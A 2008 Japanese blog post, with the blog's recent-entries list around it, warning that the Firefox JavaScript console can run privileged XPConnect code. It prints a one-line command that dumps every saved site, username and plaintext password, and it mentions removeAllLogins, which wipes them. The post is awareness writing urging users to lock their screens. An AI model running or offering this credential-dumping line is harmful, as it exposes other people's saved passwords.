2008/06/12

Recent entries from same category

  1. javascript v8エンジンでv8::Objectに内部的な値を格納する方法が分かった。 Hatena
  2. Google Chromeが使っているjavascript v8エンジンにTwitterにアクセス出来るクラスを作ってポストする。 Hatena
  3. 【速報】とりあえずjavascript v8エンジンのベンチマーク結果 Hatena
  4. Google Maps APIにIPから現在位置を取得するAPIが追加された。 Hatena
  5. 「XSLとjQuery/HTMLだけで作る、amazon最速検索」が動かなくなってたので直した Hatena

はてな
JavaScriptコンソールからパスワードぶっこ抜き - hogehoge

JavaScriptコンソールの上部の入力欄はChrome特権のコードも実行できるんで、XPConnectからゴニョゴニョっとやると平文パスワードを覗くことができちゃうんだね。

PCから離れるときは画面ロックをしないと危険ということかな。

ホントだ怖い。
具体的なコードは
Cc["@mozilla.org/login-manager;1"].getService(Ci.nsILoginManager).getAllLogins({}).forEach(function(li){ console.log(li.hostname + ":" + li.username + "," + li.password) });
※あっ書いちゃった...

離席中に覗かれるのも怖いけど、removeAllLogins実行されるのも怖い。

※もちろん特権ないと実行出来ないのでブラウジングだけで盗まれる物ではありません。
Posted at 10:01 in ソフトウェア::lang::javascript | WriteBacks (0) | Edit
Tagged as: javascript, XPConnect
Bookmarks: add to hatena add to hatena | add to delicious.com add to delicious.com | add to livedoor.clip add to livedoor.clip | add to buzzurl add to buzzurl | add to fc2bookmark add to fc2bookmark | add to Yahoo Bookmark add to Yahoo Bookmark | add to Pookmark add to Pookmark | add to NiftyClip add to NiftyClip | この記事へのリンク

WriteBacks

TrackBack ping me at
Post a comment

writeback message: Ready to post a comment.